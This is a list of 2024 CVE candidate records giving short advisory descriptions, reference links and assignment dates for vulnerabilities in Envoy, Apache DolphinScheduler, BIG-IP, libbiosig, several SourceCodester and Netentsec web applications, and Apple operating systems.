CVE    2024    23324    Candidate    Envoy is a high-performance edge/middle/service proxy. External authentication can be bypassed by downstream connections. Downstream clients can force invalid gRPC requests to be sent to ext_authz, circumventing ext_authz checks when failure_mode_allow is set to true. This issue has been addressed in releases 1.29.1, 1.28.1, 1.27.3, and 1.26.7. Users are advised to upgrade. There are no known workarounds for this vulnerability.    MISC:https://github.com/envoyproxy/envoy/commit/29989f6cc8bfd8cd2ffcb7c42711eb02c7a5168a   |   URL:https://github.com/envoyproxy/envoy/commit/29989f6cc8bfd8cd2ffcb7c42711eb02c7a5168a   |   MISC:https://github.com/envoyproxy/envoy/security/advisories/GHSA-gq3v-vvhj-96j6   |   URL:https://github.com/envoyproxy/envoy/security/advisories/GHSA-gq3v-vvhj-96j6    Assigned (20240115)
CVE    2024    23323    Candidate    Envoy is a high-performance edge/middle/service proxy. The regex expression is compiled for every request and can result in high CPU usage and increased request latency when multiple routes are configured with such matchers. This issue has been addressed in releases 1.29.1, 1.28.1, 1.27.3, and 1.26.7. Users are advised to upgrade. There are no known workarounds for this vulnerability.    MISC:https://github.com/envoyproxy/envoy/commit/71eeee8f0f0132f39e402b0ee23b361ee2f4e645   |   URL:https://github.com/envoyproxy/envoy/commit/71eeee8f0f0132f39e402b0ee23b361ee2f4e645   |   MISC:https://github.com/envoyproxy/envoy/security/advisories/GHSA-x278-4w4x-r7ch   |   URL:https://github.com/envoyproxy/envoy/security/advisories/GHSA-x278-4w4x-r7ch    Assigned (20240115)
CVE    2024    23322    Candidate    Envoy is a high-performance edge/middle/service proxy. Envoy will crash when certain timeouts happen within the same interval. The crash occurs when the following are true: 1. hedge_on_per_try_timeout is enabled, 2. per_try_idle_timeout is enabled (it can only be done in configuration), 3. per-try-timeout is enabled, either through headers or configuration and its value is equal, or within the backoff interval of the per_try_idle_timeout. This issue has been addressed in releases 1.29.1, 1.28.1, 1.27.3, and 1.26.7. Users are advised to upgrade. There are no known workarounds for this vulnerability.    MISC:https://github.com/envoyproxy/envoy/commit/843f9e6a123ed47ce139b421c14e7126f2ac685e   |   URL:https://github.com/envoyproxy/envoy/commit/843f9e6a123ed47ce139b421c14e7126f2ac685e   |   MISC:https://github.com/envoyproxy/envoy/security/advisories/GHSA-6p83-mfmh-qv38   |   URL:https://github.com/envoyproxy/envoy/security/advisories/GHSA-6p83-mfmh-qv38    Assigned (20240115)
CVE    2024    23320    Candidate    Improper Input Validation vulnerability in Apache DolphinScheduler. An authenticated user can cause arbitrary, unsandboxed javascript to be executed on the server. This issue is a legacy of CVE-2023-49299. We didn't fix it completely in CVE-2023-49299, and we added one more patch to fix it. This issue affects Apache DolphinScheduler: until 3.2.1. Users are recommended to upgrade to version 3.2.1, which fixes the issue.    MISC:https://github.com/apache/dolphinscheduler/pull/15487   |   URL:https://github.com/apache/dolphinscheduler/pull/15487   |   MISC:https://lists.apache.org/thread/25qhfvlksozzp6j9y8ozznvjdjp3lxqq   |   URL:https://lists.apache.org/thread/25qhfvlksozzp6j9y8ozznvjdjp3lxqq   |   MISC:https://lists.apache.org/thread/p7rwzdgrztdfps8x1bwx646f1mn0x6cp   |   URL:https://lists.apache.org/thread/p7rwzdgrztdfps8x1bwx646f1mn0x6cp   |   MISC:https://lists.apache.org/thread/tnf99qoc6tlnwrny4t1zk6mfszgdsokm   |   URL:https://lists.apache.org/thread/tnf99qoc6tlnwrny4t1zk6mfszgdsokm   |   MLIST:[oss-security] 20240223 CVE-2024-23320: Apache DolphinScheduler: Arbitrary js execution as root for authenticated users   |   URL:http://www.openwall.com/lists/oss-security/2024/02/23/3    Assigned (20240115)
CVE    2024    2332    Candidate    A vulnerability was found in SourceCodester Online Mobile Management Store 1.0. It has been rated as critical. This issue affects some unknown processing of the file /admin/maintenance/manage_category.php of the component HTTP GET Request Handler. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-256283.    MISC:VDB-256283 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.256283   |   MISC:VDB-256283 | SourceCodester Online Mobile Management Store HTTP GET Request manage_category.php sql injection   |   URL:https://vuldb.com/?id.256283   |   MISC:https://github.com/vanitashtml/CVE-Dumps/blob/main/Blind%20SQL%20Injection%20Manage%20Category%20-%20Mobile%20Management%20Store.md   |   URL:https://github.com/vanitashtml/CVE-Dumps/blob/main/Blind%20SQL%20Injection%20Manage%20Category%20-%20Mobile%20Management%20Store.md    Assigned (20240308)
CVE    2024    23319    Candidate    Mattermost Jira Plugin fails to protect against logout CSRF allowing an attacker to post a specially crafted message that would disconnect a user's Jira connection in Mattermost only by viewing the message.    MISC:https://mattermost.com/security-updates   |   URL:https://mattermost.com/security-updates    Assigned (20240130)
CVE    2024    23314    Candidate    When HTTP/2 is configured on BIG-IP or BIG-IP Next SPK systems, undisclosed responses can cause the Traffic Management Microkernel (TMM) to terminate. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated    MISC:https://my.f5.com/manage/s/article/K000137675   |   URL:https://my.f5.com/manage/s/article/K000137675    Assigned (20240201)
CVE    2024    23313    Candidate    An integer underflow vulnerability exists in the sopen_FAMOS_read functionality of The Biosig Project libbiosig 2.5.0 and Master Branch (ab0ee111). A specially crafted .famos file can lead to an out-of-bounds write which in turn can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.    MISC:https://talosintelligence.com/vulnerability_reports/TALOS-2024-1922   |   URL:https://talosintelligence.com/vulnerability_reports/TALOS-2024-1922    Assigned (20240123)
CVE    2024    23310    Candidate    A use-after-free vulnerability exists in the sopen_FAMOS_read functionality of The Biosig Project libbiosig 2.5.0 and Master Branch (ab0ee111). A specially crafted .famos file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.    MISC:https://talosintelligence.com/vulnerability_reports/TALOS-2024-1923   |   URL:https://talosintelligence.com/vulnerability_reports/TALOS-2024-1923    Assigned (20240123)
CVE    2024    2331    Candidate    A vulnerability was found in SourceCodester Tourist Reservation System 1.0. It has been declared as critical. This vulnerability affects the function ad_writedata of the file System.cpp. The manipulation of the argument ad_code leads to buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-256282 is the identifier assigned to this vulnerability.    MISC:VDB-256282 | CTI Indicators (IOB, IOC, IOA)   |   URL:https://vuldb.com/?ctiid.256282   |   MISC:VDB-256282 | SourceCodester Tourist Reservation System System.cpp ad_writedata buffer overflow   |   URL:https://vuldb.com/?id.256282   |   MISC:https://github.com/wkeyi0x1/vul-report/blob/main/Tourist%20Reservation%20System%20using%20C%2B%2B%20with%20Free%20Source%20Code/buffer-overflow-1.md   |   URL:https://github.com/wkeyi0x1/vul-report/blob/main/Tourist%20Reservation%20System%20using%20C%2B%2B%20with%20Free%20Source%20Code/buffer-overflow-1.md    Assigned (20240308)
CVE    2024    23308    Candidate    When a BIG-IP Advanced WAF or BIG-IP ASM policy with a Request Body Handling option is attached to a virtual server, undisclosed requests can cause the BD process to terminate. The condition results from setting the Request Body Handling option in the Header-Based Content Profile for an Allowed URL with "Apply value and content signatures and detect threat campaigns." Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated    MISC:https://my.f5.com/manage/s/article/K000137416   |   URL:https://my.f5.com/manage/s/article/K000137416    Assigned (20240201)
CVE    2024    23307    Candidate    Integer Overflow or Wraparound vulnerability in Linux Linux kernel kernel on Linux, x86, ARM (md, raid, raid5 modules) allows Forced Integer Overflow.    MISC:https://bugzilla.openanolis.cn/show_bug.cgi?id=7975   |   URL:https://bugzilla.openanolis.cn/show_bug.cgi?id=7975    Assigned (20240115)
CVE    2024    23306    Candidate    A vulnerability exists in BIG-IP Next CNF and SPK systems that may allow access to undisclosed sensitive files. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated    MISC:https://my.f5.com/manage/s/article/K000137886   |   URL:https://my.f5.com/manage/s/article/K000137886    Assigned (20240201)
CVE    2024    23305    Candidate    An out-of-bounds write vulnerability exists in the BrainVisionMarker Parsing functionality of The Biosig Project libbiosig 2.5.0 and Master Branch (ab0ee111). A specially crafted .vmrk file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.    MISC:https://talosintelligence.com/vulnerability_reports/TALOS-2024-1918   |   URL:https://talosintelligence.com/vulnerability_reports/TALOS-2024-1918    Assigned (20240122)
CVE    2024    23304    Candidate    Cybozu KUNAI for Android 3.0.20 to 3.0.21 allows a remote unauthenticated attacker to cause a denial-of-service (DoS) condition by performing certain operations.    MISC:https://cs.cybozu.co.jp/2024/010691.html   |   URL:https://cs.cybozu.co.jp/2024/010691.html   |   MISC:https://jvn.jp/en/jp/JVN18743512/   |   URL:https://jvn.jp/en/jp/JVN18743512/    Assigned (20240115)
CVE    2024    23302    Candidate    Couchbase Server before 7.2.4 has a private key leak in goxdcr.log.    MISC:https://docs.couchbase.com/server/current/release-notes/relnotes.html   |   MISC:https://forums.couchbase.com/tags/security   |   MISC:https://www.couchbase.com/alerts/    Assigned (20240112)
CVE    2024    23301    Candidate    Relax-and-Recover (aka ReaR) through 2.7 creates a world-readable initrd when using GRUB_RESCUE=y. This allows local attackers to gain access to system secrets otherwise only readable by root.    FEDORA:FEDORA-2024-49ddbf447d   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UHKMPXJNXEJJE6EVYE5HM7EKEJFQMBN7/   |   FEDORA:FEDORA-2024-a2f6e5ddb8   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7JIN57LUPBI2GDJOK3PYXNHJTZT3AQTZ/   |   MISC:https://github.com/rear/rear/issues/3122   |   MISC:https://github.com/rear/rear/pull/3123   |   MLIST:[debian-lts-announce] 20240203 [SECURITY] [DLA 3733-1] rear security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/02/msg00003.html    Assigned (20240112)
CVE    2024    23300    Candidate    A use-after-free issue was addressed with improved memory management. This issue is fixed in GarageBand 10.4.11. Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution.    FULLDISC:20240313 APPLE-SA-03-12-2024-1 GarageBand 10.4.11   |   URL:http://seclists.org/fulldisclosure/2024/Mar/27   |   MISC:https://support.apple.com/en-us/HT214090   |   URL:https://support.apple.com/en-us/HT214090    Assigned (20240112)
CVE    2024    2330    Candidate    A vulnerability was found in Netentsec NS-ASG Application Security Gateway 6.3. It has been classified as critical. This affects an unknown part of the file /protocol/index.php. The manipulation of the argument IPAddr leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-256281 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-256281 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.256281   |   MISC:VDB-256281 | Netentsec NS-ASG Application Security Gateway index.php sql injection   |   URL:https://vuldb.com/?id.256281   |   MISC:https://github.com/jikedaodao/cve/blob/main/NS-ASG-sql-addmacbind.md   |   URL:https://github.com/jikedaodao/cve/blob/main/NS-ASG-sql-addmacbind.md    Assigned (20240308)
CVE    2024    23298    Candidate    A logic issue was addressed with improved state management.    MISC:https://support.apple.com/en-us/HT214092   |   URL:https://support.apple.com/en-us/HT214092    Assigned (20240112)
CVE    2024    23297    Candidate    The issue was addressed with improved checks. This issue is fixed in tvOS 17.4, iOS 17.4 and iPadOS 17.4, watchOS 10.4. A malicious application may be able to access private information.    FULLDISC:20240313 APPLE-SA-03-07-2024-5 watchOS 10.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/24   |   FULLDISC:20240313 APPLE-SA-03-07-2024-6 tvOS 17.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/25   |   MISC:https://support.apple.com/en-us/HT214081   |   URL:https://support.apple.com/en-us/HT214081   |   MISC:https://support.apple.com/en-us/HT214086   |   URL:https://support.apple.com/en-us/HT214086   |   MISC:https://support.apple.com/en-us/HT214088   |   URL:https://support.apple.com/en-us/HT214088    Assigned (20240112)
CVE    2024    23296    Candidate    A memory corruption issue was addressed with improved validation. This issue is fixed in iOS 17.4 and iPadOS 17.4. An attacker with arbitrary kernel read and write capability may be able to bypass kernel memory protections. Apple is aware of a report that this issue may have been exploited.    CONFIRM:https://support.apple.com/kb/HT214084   |   CONFIRM:https://support.apple.com/kb/HT214086   |   CONFIRM:https://support.apple.com/kb/HT214087   |   CONFIRM:https://support.apple.com/kb/HT214088   |   FULLDISC:20240313 APPLE-SA-03-05-2024-1 iOS 17.4 and iPadOS 17.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/18   |   FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/21   |   FULLDISC:20240313 APPLE-SA-03-07-2024-5 watchOS 10.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/24   |   FULLDISC:20240313 APPLE-SA-03-07-2024-6 tvOS 17.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/25   |   FULLDISC:20240313 APPLE-SA-03-07-2024-7 visionOS 1.1   |   URL:http://seclists.org/fulldisclosure/2024/Mar/26   |   MISC:https://support.apple.com/en-us/HT214081   |   URL:https://support.apple.com/en-us/HT214081    Assigned (20240112)
CVE    2024    23295    Candidate    A permissions issue was addressed to help ensure Personas are always protected. This issue is fixed in visionOS 1.1. An unauthenticated user may be able to use an unprotected Persona.    FULLDISC:20240313 APPLE-SA-03-07-2024-7 visionOS 1.1   |   URL:http://seclists.org/fulldisclosure/2024/Mar/26   |   MISC:https://support.apple.com/en-us/HT214087   |   URL:https://support.apple.com/en-us/HT214087    Assigned (20240112)
CVE    2024    23294    Candidate    This issue was addressed by removing the vulnerable code. This issue is fixed in macOS Sonoma 14.4. Processing malicious input may lead to code execution.    FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/21   |   MISC:https://support.apple.com/en-us/HT214084   |   URL:https://support.apple.com/en-us/HT214084    Assigned (20240112)
CVE    2024    23293    Candidate    This issue was addressed through improved state management. This issue is fixed in tvOS 17.4, iOS 17.4 and iPadOS 17.4, macOS Sonoma 14.4, watchOS 10.4. An attacker with physical access may be able to use Siri to access sensitive user data.    FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/21   |   FULLDISC:20240313 APPLE-SA-03-07-2024-5 watchOS 10.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/24   |   FULLDISC:20240313 APPLE-SA-03-07-2024-6 tvOS 17.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/25   |   MISC:https://support.apple.com/en-us/HT214081   |   URL:https://support.apple.com/en-us/HT214081   |   MISC:https://support.apple.com/en-us/HT214084   |   URL:https://support.apple.com/en-us/HT214084   |   MISC:https://support.apple.com/en-us/HT214086   |   URL:https://support.apple.com/en-us/HT214086   |   MISC:https://support.apple.com/en-us/HT214088   |   URL:https://support.apple.com/en-us/HT214088    Assigned (20240112)
CVE    2024    23292    Candidate    This issue was addressed with improved data protection. This issue is fixed in macOS Sonoma 14.4, iOS 17.4 and iPadOS 17.4. An app may be able to access information about a user's contacts.    FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/21   |   MISC:https://support.apple.com/en-us/HT214081   |   URL:https://support.apple.com/en-us/HT214081   |   MISC:https://support.apple.com/en-us/HT214084   |   URL:https://support.apple.com/en-us/HT214084    Assigned (20240112)
CVE    2024    23291    Candidate    A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in tvOS 17.4, iOS 17.4 and iPadOS 17.4, macOS Sonoma 14.4, watchOS 10.4. A malicious app may be able to observe user data in log entries related to accessibility notifications.    FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/21   |   FULLDISC:20240313 APPLE-SA-03-07-2024-5 watchOS 10.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/24   |   FULLDISC:20240313 APPLE-SA-03-07-2024-6 tvOS 17.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/25   |   MISC:https://support.apple.com/en-us/HT214081   |   URL:https://support.apple.com/en-us/HT214081   |   MISC:https://support.apple.com/en-us/HT214084   |   URL:https://support.apple.com/en-us/HT214084   |   MISC:https://support.apple.com/en-us/HT214086   |   URL:https://support.apple.com/en-us/HT214086   |   MISC:https://support.apple.com/en-us/HT214088   |   URL:https://support.apple.com/en-us/HT214088    Assigned (20240112)
CVE    2024    23290    Candidate    A logic issue was addressed with improved restrictions. This issue is fixed in tvOS 17.4, iOS 17.4 and iPadOS 17.4, macOS Sonoma 14.4, watchOS 10.4. An app may be able to access user-sensitive data.    FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/21   |   FULLDISC:20240313 APPLE-SA-03-07-2024-5 watchOS 10.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/24   |   FULLDISC:20240313 APPLE-SA-03-07-2024-6 tvOS 17.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/25   |   MISC:https://support.apple.com/en-us/HT214081   |   URL:https://support.apple.com/en-us/HT214081   |   MISC:https://support.apple.com/en-us/HT214084   |   URL:https://support.apple.com/en-us/HT214084   |   MISC:https://support.apple.com/en-us/HT214086   |   URL:https://support.apple.com/en-us/HT214086   |   MISC:https://support.apple.com/en-us/HT214088   |   URL:https://support.apple.com/en-us/HT214088    Assigned (20240112)
CVE    2024    2329    Candidate    A vulnerability was found in Netentsec NS-ASG Application Security Gateway 6.3 and classified as critical. Affected by this issue is some unknown functionality of the file /admin/list_resource_icon.php?action=delete. The manipulation of the argument IconId leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-256280. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-256280 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.256280   |   MISC:VDB-256280 | Netentsec NS-ASG Application Security Gateway sql injection   |   URL:https://vuldb.com/?id.256280   |   MISC:https://github.com/flyyue2001/cve/blob/main/NS-ASG-sql-list_resource_icon.md   |   URL:https://github.com/flyyue2001/cve/blob/main/NS-ASG-sql-list_resource_icon.md    Assigned (20240308)
CVE    2024    23289    Candidate    A lock screen issue was addressed with improved state management. This issue is fixed in iOS 16.7.6 and iPadOS 16.7.6, iOS 17.4 and iPadOS 17.4, macOS Sonoma 14.4, watchOS 10.4. A person with physical access to a device may be able to use Siri to access private calendar information.    FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/21   |   FULLDISC:20240313 APPLE-SA-03-07-2024-5 watchOS 10.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/24   |   MISC:https://support.apple.com/en-us/HT214081   |   URL:https://support.apple.com/en-us/HT214081   |   MISC:https://support.apple.com/en-us/HT214082   |   URL:https://support.apple.com/en-us/HT214082   |   MISC:https://support.apple.com/en-us/HT214084   |   URL:https://support.apple.com/en-us/HT214084   |   MISC:https://support.apple.com/en-us/HT214088   |   URL:https://support.apple.com/en-us/HT214088    Assigned (20240112)
CVE    2024    23288    Candidate    This issue was addressed by removing the vulnerable code. This issue is fixed in tvOS 17.4, iOS 17.4 and iPadOS 17.4, macOS Sonoma 14.4, watchOS 10.4. An app may be able to elevate privileges.    FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/21   |   FULLDISC:20240313 APPLE-SA-03-07-2024-5 watchOS 10.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/24   |   FULLDISC:20240313 APPLE-SA-03-07-2024-6 tvOS 17.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/25   |   MISC:https://support.apple.com/en-us/HT214081   |   URL:https://support.apple.com/en-us/HT214081   |   MISC:https://support.apple.com/en-us/HT214084   |   URL:https://support.apple.com/en-us/HT214084   |   MISC:https://support.apple.com/en-us/HT214086   |   URL:https://support.apple.com/en-us/HT214086   |   MISC:https://support.apple.com/en-us/HT214088   |   URL:https://support.apple.com/en-us/HT214088    Assigned (20240112)
CVE    2024    23287    Candidate    A privacy issue was addressed with improved handling of temporary files. This issue is fixed in macOS Sonoma 14.4, iOS 17.4 and iPadOS 17.4, watchOS 10.4. An app may be able to access user-sensitive data.    FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/21   |   FULLDISC:20240313 APPLE-SA-03-07-2024-5 watchOS 10.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/24   |   MISC:https://support.apple.com/en-us/HT214081   |   URL:https://support.apple.com/en-us/HT214081   |   MISC:https://support.apple.com/en-us/HT214084   |   URL:https://support.apple.com/en-us/HT214084   |   MISC:https://support.apple.com/en-us/HT214088   |   URL:https://support.apple.com/en-us/HT214088    Assigned (20240112)
CVE    2024    23286    Candidate    A buffer overflow issue was addressed with improved memory handling. This issue is fixed in macOS Monterey 12.7.4, macOS Ventura 13.6.5, macOS Sonoma 14.4, visionOS 1.1, iOS 17.4 and iPadOS 17.4, watchOS 10.4, iOS 16.7.6 and iPadOS 16.7.6, tvOS 17.4. Processing an image may lead to arbitrary code execution.    FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/21   |   FULLDISC:20240313 APPLE-SA-03-07-2024-3 macOS Ventura 13.6.5   |   URL:http://seclists.org/fulldisclosure/2024/Mar/22   |   FULLDISC:20240313 APPLE-SA-03-07-2024-4 macOS Monterey 12.7.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/23   |   FULLDISC:20240313 APPLE-SA-03-07-2024-5 watchOS 10.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/24   |   FULLDISC:20240313 APPLE-SA-03-07-2024-6 tvOS 17.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/25   |   FULLDISC:20240313 APPLE-SA-03-07-2024-7 visionOS 1.1   |   URL:http://seclists.org/fulldisclosure/2024/Mar/26   |   MISC:https://support.apple.com/en-us/HT214081   |   URL:https://support.apple.com/en-us/HT214081   |   MISC:https://support.apple.com/en-us/HT214082   |   URL:https://support.apple.com/en-us/HT214082   |   MISC:https://support.apple.com/en-us/HT214083   |   URL:https://support.apple.com/en-us/HT214083   |   MISC:https://support.apple.com/en-us/HT214084   |   URL:https://support.apple.com/en-us/HT214084   |   MISC:https://support.apple.com/en-us/HT214085   |   URL:https://support.apple.com/en-us/HT214085   |   MISC:https://support.apple.com/en-us/HT214086   |   URL:https://support.apple.com/en-us/HT214086   |   MISC:https://support.apple.com/en-us/HT214087   |   URL:https://support.apple.com/en-us/HT214087   |   MISC:https://support.apple.com/en-us/HT214088   |   URL:https://support.apple.com/en-us/HT214088    Assigned (20240112)
CVE    2024    23285    Candidate    This issue was addressed with improved handling of symlinks. This issue is fixed in macOS Sonoma 14.4. An app may be able to create symlinks to protected regions of the disk.    FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/21   |   MISC:https://support.apple.com/en-us/HT214084   |   URL:https://support.apple.com/en-us/HT214084    Assigned (20240112)
CVE    2024    23284    Candidate    A logic issue was addressed with improved state management. This issue is fixed in tvOS 17.4, macOS Sonoma 14.4, visionOS 1.1, iOS 17.4 and iPadOS 17.4, watchOS 10.4, iOS 16.7.6 and iPadOS 16.7.6, Safari 17.4. Processing maliciously crafted web content may prevent Content Security Policy from being enforced.    FEDORA:FEDORA-2024-7ee03010c5   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AO4BNNL5X2LQBJ6WX7VT4SGMA6R7DUU5/   |   FEDORA:FEDORA-2024-ee43b83290   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BAIPBVDQV3GHMSNSZNEJCRZEPM7BEYGF/   |   MISC:http://seclists.org/fulldisclosure/2024/Mar/20   |   URL:http://seclists.org/fulldisclosure/2024/Mar/20   |   MISC:http://seclists.org/fulldisclosure/2024/Mar/21   |   URL:http://seclists.org/fulldisclosure/2024/Mar/21   |   MISC:http://seclists.org/fulldisclosure/2024/Mar/24   |   URL:http://seclists.org/fulldisclosure/2024/Mar/24   |   MISC:http://seclists.org/fulldisclosure/2024/Mar/25   |   URL:http://seclists.org/fulldisclosure/2024/Mar/25   |   MISC:http://seclists.org/fulldisclosure/2024/Mar/26   |   URL:http://seclists.org/fulldisclosure/2024/Mar/26   |   MISC:https://support.apple.com/en-us/HT214081   |   URL:https://support.apple.com/en-us/HT214081   |   MISC:https://support.apple.com/en-us/HT214082   |   URL:https://support.apple.com/en-us/HT214082   |   MISC:https://support.apple.com/en-us/HT214084   |   URL:https://support.apple.com/en-us/HT214084   |   MISC:https://support.apple.com/en-us/HT214086   |   URL:https://support.apple.com/en-us/HT214086   |   MISC:https://support.apple.com/en-us/HT214087   |   URL:https://support.apple.com/en-us/HT214087   |   MISC:https://support.apple.com/en-us/HT214088   |   URL:https://support.apple.com/en-us/HT214088   |   MISC:https://support.apple.com/en-us/HT214089   |   URL:https://support.apple.com/en-us/HT214089    Assigned (20240112)
CVE    2024    23283    Candidate    A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in iOS 16.7.6 and iPadOS 16.7.6, macOS Monterey 12.7.4, macOS Sonoma 14.4, macOS Ventura 13.6.5. An app may be able to access user-sensitive data.    FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/21   |   FULLDISC:20240313 APPLE-SA-03-07-2024-3 macOS Ventura 13.6.5   |   URL:http://seclists.org/fulldisclosure/2024/Mar/22   |   FULLDISC:20240313 APPLE-SA-03-07-2024-4 macOS Monterey 12.7.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/23   |   MISC:https://support.apple.com/en-us/HT214082   |   URL:https://support.apple.com/en-us/HT214082   |   MISC:https://support.apple.com/en-us/HT214083   |   URL:https://support.apple.com/en-us/HT214083   |   MISC:https://support.apple.com/en-us/HT214084   |   URL:https://support.apple.com/en-us/HT214084   |   MISC:https://support.apple.com/en-us/HT214085   |   URL:https://support.apple.com/en-us/HT214085    Assigned (20240112)
CVE    2024    23281    Candidate    This issue was addressed with improved state management. This issue is fixed in macOS Sonoma 14.4. An app may be able to access sensitive user data.    FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/21   |   MISC:https://support.apple.com/en-us/HT214084   |   URL:https://support.apple.com/en-us/HT214084    Assigned (20240112)
CVE    2024    23280    Candidate    An injection issue was addressed with improved validation. This issue is fixed in Safari 17.4, macOS Sonoma 14.4, iOS 17.4 and iPadOS 17.4, watchOS 10.4, tvOS 17.4. A maliciously crafted webpage may be able to fingerprint the user.    FEDORA:FEDORA-2024-7ee03010c5   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AO4BNNL5X2LQBJ6WX7VT4SGMA6R7DUU5/   |   FEDORA:FEDORA-2024-ee43b83290   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BAIPBVDQV3GHMSNSZNEJCRZEPM7BEYGF/   |   FULLDISC:20240313 APPLE-SA-03-07-2024-1 Safari 17.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/20   |   FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/21   |   FULLDISC:20240313 APPLE-SA-03-07-2024-5 watchOS 10.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/24   |   FULLDISC:20240313 APPLE-SA-03-07-2024-6 tvOS 17.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/25   |   MISC:https://support.apple.com/en-us/HT214081   |   URL:https://support.apple.com/en-us/HT214081   |   MISC:https://support.apple.com/en-us/HT214084   |   URL:https://support.apple.com/en-us/HT214084   |   MISC:https://support.apple.com/en-us/HT214086   |   URL:https://support.apple.com/en-us/HT214086   |   MISC:https://support.apple.com/en-us/HT214088   |   URL:https://support.apple.com/en-us/HT214088   |   MISC:https://support.apple.com/en-us/HT214089   |   URL:https://support.apple.com/en-us/HT214089    Assigned (20240112)
CVE    2024    23279    Candidate    A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in macOS Sonoma 14.4. An app may be able to access user-sensitive data.    FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/21   |   MISC:https://support.apple.com/en-us/HT214084   |   URL:https://support.apple.com/en-us/HT214084    Assigned (20240112)
